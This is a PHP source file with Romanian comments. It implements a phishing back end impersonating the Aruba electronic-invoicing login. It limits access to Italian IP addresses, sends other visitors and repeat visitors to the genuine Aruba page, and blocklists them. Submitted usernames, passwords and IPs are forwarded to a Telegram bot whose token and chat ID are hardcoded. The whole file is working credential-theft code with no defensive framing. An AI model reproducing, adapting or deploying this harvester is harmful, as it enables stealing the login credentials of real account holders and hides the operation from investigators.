<?php
session_start();

// Fișierele pentru logare și blocare
$logFile = 'logs.txt'; // Fișier pentru logare IP-uri și locații
$blockFile = 'ip_block_list.txt'; // Fișier pentru IP-urile și UUID-urile blocate

// Configurare date pentru Telegram
$botToken = "7926532790:AAEy9y_XslyRd0dgaKb672TZyuzDZv3ykco"; // Token-ul botului
$chatId = "7196867329"; // ID-ul chatului unde primești mesajele

// Funcția pentru a verifica dacă un IP sau UUID este blocat
function isBlocked($uuid, $ip, $file) {
    if (!file_exists($file)) {
        return false;
    }
    $blockedEntries = file($file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
    foreach ($blockedEntries as $entry) {
        if (strpos($entry, $uuid) !== false || strpos($entry, $ip) !== false) {
            return true;
        }
    }
    return false;
}

// Funcția pentru a adăuga un IP și UUID în lista de blocare
function blockEntry($uuid, $ip, $file) {
    if (!isBlocked($uuid, $ip, $file)) { // Asigură-te că UUID-ul și IP-ul nu sunt deja blocate
        $entry = "UUID: $uuid - IP: $ip";
        file_put_contents($file, $entry . PHP_EOL, FILE_APPEND | LOCK_EX);
    }
}

// Obține IP-ul real al utilizatorului (include verificarea pentru proxy-uri)
$clientIp = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];

// Verifică dacă IP-ul și UUID-ul sunt deja blocate
if (isBlocked($_SESSION['client_uuid'], $clientIp, $blockFile)) {
    logActivity("IP: {$clientIp} - UUID: {$_SESSION['client_uuid']} - Access Denied (Blocked IP or UUID)");
    header('Location: https://fatturazioneelettronica.aruba.it/#login');
    exit();
}

// Verifică locația utilizatorului
$country = getCountryByCurl($clientIp);
$allowedCountries = ['IT']; // Italia

// Loghează IP-ul și țara detectată
logActivity("IP: {$clientIp}, Country: {$country}, UUID: {$_SESSION['client_uuid']}");

// Redirecționează IP-urile din alte țări și adaugă-le în lista de blocare
if ($country === "Unknown" || !in_array($country, $allowedCountries)) {
    logActivity("IP: {$clientIp}, Country: {$country} - Access Denied (Not Allowed Country), UUID: {$_SESSION['client_uuid']}");
    blockEntry($_SESSION['client_uuid'], $clientIp, $blockFile);
    header('Location: https://fatturazioneelettronica.aruba.it/#login');
    exit();
}

// Dacă metoda este POST, trimite datele de login către Telegram și blochează IP-ul și UUID-ul
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $username = isset($_POST['username']) ? htmlspecialchars($_POST['username']) : '';
    $password = isset($_POST['password']) ? htmlspecialchars($_POST['password']) : '';

    // Trimiterea datelor către Telegram
    sendToTelegram($username, $password, $clientIp);

    // Blochează IP-ul și UUID-ul
    blockEntry($_SESSION['client_uuid'], $clientIp, $blockFile);

    // Loghează activitatea
    logActivity("IP: {$clientIp} - UUID: {$_SESSION['client_uuid']} - Added to block list after login attempt");

    // Redirecționează utilizatorul către URL-ul specificat
    header("Location: update.html");
    exit();
}

// Funcția pentru a trimite datele către Telegram
function sendToTelegram($username, $password, $ip) {
    global $botToken, $chatId;

    // Construim mesajul pentru Telegram
    $message = "🔔 *User Aruba:*\n\n";
    $message .= "👤 *Username*: `$username`\n";
    $message .= "🔑 *Password*: `$password`\n";
    $message .= "🌐 *IP*: `$ip`\n";
    $message .= "🕒 *Data și ora*: `" . date('Y-m-d H:i:s') . "` (Europe/Berlin)";

    // Trimiterea mesajului folosind cURL
    $url = "https://api.telegram.org/bot$botToken/sendMessage";
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'Markdown'
    ]));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $response = curl_exec($ch);
    if (curl_errno($ch)) {
        logActivity("Eroare la trimiterea mesajului către Telegram: " . curl_error($ch));
    } else {
        logActivity("Datele au fost trimise către Telegram. IP: $ip");
    }
    curl_close($ch);
}

// Funcția pentru a obține locația IP-ului utilizând ip-api.com
function getCountryByCurl($ip) {
    $url = "http://ip-api.com/json/{$ip}";
    $ch = curl_init();

    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);

    $response = curl_exec($ch);

    if (curl_errno($ch)) {
        error_log("Eroare cURL: " . curl_error($ch));
        curl_close($ch);
        return "Unknown";
    }

    curl_close($ch);

    $data = json_decode($response, true);

    if (isset($data['status']) && $data['status'] === 'success') {
        return $data['countryCode'] ?? "Unknown";
    }

    return "Unknown";
}

// Funcția pentru a salva log-uri
function logActivity($message) {
    global $logFile;
    $logEntry = "$message - Time: " . date('Y-m-d H:i:s') . PHP_EOL;
    file_put_contents($logFile, $logEntry, FILE_APPEND);
}
?>
